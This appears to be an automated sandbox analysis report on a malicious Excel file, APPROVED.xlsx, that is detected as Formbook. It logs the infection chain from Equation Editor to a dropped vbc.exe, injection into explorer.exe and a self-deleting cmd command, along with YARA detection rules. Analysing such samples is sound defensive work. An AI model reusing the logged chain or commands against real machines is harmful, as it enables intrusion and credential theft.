Source: C:\Users\Public\vbc.exe Code function: 4_2_00371D59 4_2_00371D59
Source: C:\Users\Public\vbc.exe Code function: 4_2_00372078 4_2_00372078
Source: C:\Users\Public\vbc.exe Code function: 4_2_00372088 4_2_00372088
Source: C:\Users\Public\vbc.exe Code function: 4_2_00379220 4_2_00379220
Source: C:\Users\Public\vbc.exe Code function: 4_2_00372290 4_2_00372290
Source: C:\Users\Public\vbc.exe Code function: 4_2_0037A2EA 4_2_0037A2EA
Source: C:\Users\Public\vbc.exe Code function: 4_2_00379440 4_2_00379440
Source: C:\Users\Public\vbc.exe Code function: 4_2_0037F440 4_2_0037F440
Source: C:\Users\Public\vbc.exe Code function: 4_2_00374490 4_2_00374490
Source: C:\Users\Public\vbc.exe Code function: 4_2_003714CF 4_2_003714CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_003796A0 4_2_003796A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0037273C 4_2_0037273C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00378E88 4_2_00378E88
Source: C:\Users\Public\vbc.exe Code function: 4_2_00377FE8 4_2_00377FE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004F2A68 4_2_004F2A68
Source: C:\Users\Public\vbc.exe Code function: 4_2_004F0048 4_2_004F0048
Source: C:\Users\Public\vbc.exe Code function: 4_2_004F2640 4_2_004F2640
Source: C:\Users\Public\vbc.exe Code function: 4_2_004F2C78 4_2_004F2C78
Source: C:\Users\Public\vbc.exe Code function: 4_2_004F2C2C 4_2_004F2C2C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004F2CC7 4_2_004F2CC7
Source: C:\Users\Public\vbc.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B8B1 8_2_0041B8B1
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B963 8_2_0041B963
Source: C:\Users\Public\vbc.exe Code function: 8_2_00408C4B 8_2_00408C4B
Source: C:\Users\Public\vbc.exe Code function: 8_2_00408C50 8_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B493 8_2_0041B493
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041B496 8_2_0041B496
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041C539 8_2_0041C539
Source: C:\Users\Public\vbc.exe Code function: 8_2_00402D89 8_2_00402D89
Source: C:\Users\Public\vbc.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041CE85 8_2_0041CE85
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041BF12 8_2_0041BF12
Source: C:\Users\Public\vbc.exe Code function: 8_2_0041C795 8_2_0041C795
Source: C:\Users\Public\vbc.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093E0C6 8_2_0093E0C6
Source: C:\Users\Public\vbc.exe Code function: 8_2_0096D005 8_2_0096D005
Source: C:\Users\Public\vbc.exe Code function: 8_2_0095905A 8_2_0095905A
Source: C:\Users\Public\vbc.exe Code function: 8_2_00943040 8_2_00943040
Source: C:\Users\Public\vbc.exe Code function: 8_2_009BD06D 8_2_009BD06D
Source: C:\Users\Public\vbc.exe Code function: 8_2_009CD13F 8_2_009CD13F
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093E2E9 8_2_0093E2E9
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E1238 8_2_009E1238
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E63BF 8_2_009E63BF
Source: C:\Users\Public\vbc.exe Code function: 8_2_009663DB 8_2_009663DB
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093F3CF 8_2_0093F3CF
Source: C:\Users\Public\vbc.exe Code function: 8_2_00942305 8_2_00942305
Source: C:\Users\Public\vbc.exe Code function: 8_2_00947353 8_2_00947353
Source: C:\Users\Public\vbc.exe Code function: 8_2_0098A37B 8_2_0098A37B
Source: C:\Users\Public\vbc.exe Code function: 8_2_00975485 8_2_00975485
Source: C:\Users\Public\vbc.exe Code function: 8_2_00951489 8_2_00951489
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C443E 8_2_009C443E
Source: C:\Users\Public\vbc.exe Code function: 8_2_0097D47D 8_2_0097D47D
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E35DA 8_2_009E35DA
Source: C:\Users\Public\vbc.exe Code function: 8_2_0095C5F0 8_2_0095C5F0
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C05E3 8_2_009C05E3
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094351F 8_2_0094351F
Source: C:\Users\Public\vbc.exe Code function: 8_2_00986540 8_2_00986540
Source: C:\Users\Public\vbc.exe Code function: 8_2_00944680 8_2_00944680
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094E6C1 8_2_0094E6C1
Source: C:\Users\Public\vbc.exe Code function: 8_2_0098A634 8_2_0098A634
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E2622 8_2_009E2622
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C579A 8_2_009C579A
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094C7BC 8_2_0094C7BC
Source: C:\Users\Public\vbc.exe Code function: 8_2_009757C3 8_2_009757C3
Source: C:\Users\Public\vbc.exe Code function: 8_2_009BF8C4 8_2_009BF8C4
Source: C:\Users\Public\vbc.exe Code function: 8_2_009DF8EE 8_2_009DF8EE
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094C85C 8_2_0094C85C
Source: C:\Users\Public\vbc.exe Code function: 8_2_0096286D 8_2_0096286D
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E098E 8_2_009E098E
Source: C:\Users\Public\vbc.exe Code function: 8_2_009429B2 8_2_009429B2
Source: C:\Users\Public\vbc.exe Code function: 8_2_009569FE 8_2_009569FE
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C5955 8_2_009C5955
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C394B 8_2_009C394B
Source: C:\Users\Public\vbc.exe Code function: 8_2_009F3A83 8_2_009F3A83
Source: C:\Users\Public\vbc.exe Code function: 8_2_009ECBA4 8_2_009ECBA4
Source: C:\Users\Public\vbc.exe Code function: 8_2_0093FBD7 8_2_0093FBD7
Source: C:\Users\Public\vbc.exe Code function: 8_2_009CDBDA 8_2_009CDBDA
Source: C:\Users\Public\vbc.exe Code function: 8_2_009C6BCB 8_2_009C6BCB
Source: C:\Users\Public\vbc.exe Code function: 8_2_00967B00 8_2_00967B00
Source: C:\Users\Public\vbc.exe Code function: 8_2_009E2C9C 8_2_009E2C9C
Source: C:\Users\Public\vbc.exe Code function: 8_2_009CAC5E 8_2_009CAC5E
Source: C:\Users\Public\vbc.exe Code function: 8_2_009DFDDD 8_2_009DFDDD
Source: C:\Users\Public\vbc.exe Code function: 8_2_00970D3B 8_2_00970D3B
Source: C:\Users\Public\vbc.exe Code function: 8_2_0094CD5B 8_2_0094CD5B
Source: C:\Users\Public\vbc.exe Code function: 8_2_00972E2F 8_2_00972E2F
Source: C:\Users\Public\vbc.exe Code function: 8_2_0095EE4C 8_2_0095EE4C
Source: C:\Users\Public\vbc.exe Code function: 8_2_009DCFB1 8_2_009DCFB1
Source: C:\Users\Public\vbc.exe Code function: 8_2_009B2FDC 8_2_009B2FDC
Source: C:\Users\Public\vbc.exe Code function: 8_2_009CBF14 8_2_009CBF14
Source: C:\Users\Public\vbc.exe Code function: 8_2_00950F3F 8_2_00950F3F
Source: C:\Users\Public\vbc.exe Code function: 8_2_0096DF7C 8_2_0096DF7C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A2E2E9 11_2_02A2E2E9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AD1238 11_2_02AD1238
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AD63BF 11_2_02AD63BF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A2F3CF 11_2_02A2F3CF
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A563DB 11_2_02A563DB
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A32305 11_2_02A32305
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A7A37B 11_2_02A7A37B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A37353 11_2_02A37353
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A2E0C6 11_2_02A2E0C6
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A5D005 11_2_02A5D005
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AAD06D 11_2_02AAD06D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A33040 11_2_02A33040
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A4905A 11_2_02A4905A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A34680 11_2_02A34680
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A3E6C1 11_2_02A3E6C1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AD2622 11_2_02AD2622
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A7A634 11_2_02A7A634
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A3C7BC 11_2_02A3C7BC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AB579A 11_2_02AB579A
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A657C3 11_2_02A657C3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A65485 11_2_02A65485
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A41489 11_2_02A41489
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AB443E 11_2_02AB443E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A6D47D 11_2_02A6D47D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AB05E3 11_2_02AB05E3
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A4C5F0 11_2_02A4C5F0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A3351F 11_2_02A3351F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A76540 11_2_02A76540
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AE3A83 11_2_02AE3A83
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02ADCBA4 11_2_02ADCBA4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02ABDBDA 11_2_02ABDBDA
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A2FBD7 11_2_02A2FBD7
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A57B00 11_2_02A57B00
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02ACF8EE 11_2_02ACF8EE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AAF8C4 11_2_02AAF8C4
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A5286D 11_2_02A5286D
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A3C85C 11_2_02A3C85C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A329B2 11_2_02A329B2
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AD098E 11_2_02AD098E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A469FE 11_2_02A469FE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AB394B 11_2_02AB394B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AB5955 11_2_02AB5955
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A62E2F 11_2_02A62E2F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A4EE4C 11_2_02A4EE4C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02ACCFB1 11_2_02ACCFB1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02AA2FDC 11_2_02AA2FDC
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A40F3F 11_2_02A40F3F
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A5DF7C 11_2_02A5DF7C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02ACFDDD 11_2_02ACFDDD
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A60D3B 11_2_02A60D3B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_02A3CD5B 11_2_02A3CD5B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B493 11_2_0009B493
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B496 11_2_0009B496
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009C539 11_2_0009C539
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009C795 11_2_0009C795
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B8B1 11_2_0009B8B1
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009B954 11_2_0009B954
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00088C4B 11_2_00088C4B
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00088C50 11_2_00088C50
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00082D89 11_2_00082D89
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00082D90 11_2_00082D90
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009CE85 11_2_0009CE85
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_0009BF12 11_2_0009BF12
Source: C:\Windows\SysWOW64\explorer.exe Code function: 11_2_00082FB0 11_2_00082FB0
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: APPROVED.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02A2DF5C appears 121 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02A9F970 appears 84 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02A7373B appears 245 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02A73F92 appears 132 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 02A2E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093DF5C appears 129 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0098373B appears 248 times
Source: C:\Users\Public\vbc.exe Code function: String function: 009AF970 appears 84 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00983F92 appears 132 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0093E2A8 appears 60 times
Yara signature match
Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2206375339.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2349749079.00000000003A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2153220002.0000000003339000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2349596939.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2207492144.0000000000640000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.2207429272.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.2349769436.00000000003D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: explorer.exe, 00000009.00000000.2161103506.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@17/7@7/7
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$APPROVED.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCF21.tmp Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ................................C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.v.b.c...e.x.e...........................................2.........2.......2..... Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Console Write: ......................2.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........`3........4.t...........0.......................&.................2..... Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2153003436.000000000235D000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp Binary or memory string: select EmployeeID from employeeattendance where EmployeeID=@findAUnable to delete..Already in use{select EmployeeID from employeepayment where EmployeeID=@finduselect EmployeeID from advanceentry where EmployeeID=@findwdelete from employeeregistration where EmployeeID=@DELETE1;
Source: APPROVED.xlsx ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: APPROVED.xlsx Static file information: File size 1101944 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdb source: vbc.exe, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, explorer.exe
Source: Binary string: explorer.pdb source: vbc.exe, 00000008.00000003.2203754103.0000000002730000.00000004.00000001.sdmp
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\UkOfXfDwRs\src\obj\x86\Debug\SyncSortedList.pdbh source: vbc.exe, 00000004.00000002.2151563450.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000005.00000000.2146119933.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2147303196.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2148489931.00000000000B2000.00000020.00020000.sdmp, vbc.exe, 00000008.00000000.2149944389.00000000000B2000.00000020.00020000.sdmp, explorer.exe, 0000000B.00000002.2352710189.0000000002F17000.00000004.00000001.sdmp
Source: APPROVED.xlsx Initial sample: OLE indicators vbamacros = False
Source: APPROVED.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0037B5E4 push ebp; retf 4_2_0037B5E6
